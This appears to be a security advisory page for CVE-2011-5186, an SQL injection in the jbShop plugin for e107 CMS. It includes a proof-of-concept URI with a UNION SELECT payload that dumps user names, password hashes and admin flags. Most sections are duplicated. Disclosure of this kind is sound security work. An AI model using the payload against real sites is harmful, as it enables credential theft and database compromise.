e107 CMS jbShop Plugin 'item_id' SQL Injection Vulnerability
BID:50438
Info
e107 CMS jbShop Plugin 'item_id' SQL Injection Vulnerability
| Bugtraq ID: | 50438 |
| Class: | Input Validation Error |
| CVE: |
CVE-2011-5186 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 31 2011 12:00AM |
| Updated: | Sep 21 2012 05:40PM |
| Credit: | Robert Cooper |
| Vulnerable: |
jbShop jbShop 0 |
| Not Vulnerable: | |
Discussion
e107 CMS jbShop Plugin 'item_id' SQL Injection Vulnerability
The jbShop plugin for the e107 CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The jbShop plugin for the e107 CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
e107 CMS jbShop Plugin 'item_id' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com//plugins/jbshop/jbshop.php?item_details=1&item_id=-1 union all select group_concat(user_loginname,0x3a,user_password,0x3a,user_admin),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM e107_user--
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com//plugins/jbshop/jbshop.php?item_details=1&item_id=-1 union all select group_concat(user_loginname,0x3a,user_password,0x3a,user_admin),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM e107_user--
Solution / Fix
e107 CMS jbShop Plugin 'item_id' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
e107 CMS jbShop Plugin 'item_id' SQL Injection Vulnerability
References:
References:
- e107 Inc. announces new branding and the release of v1.0 (e107)
- jbshop Homepage (SourceForge)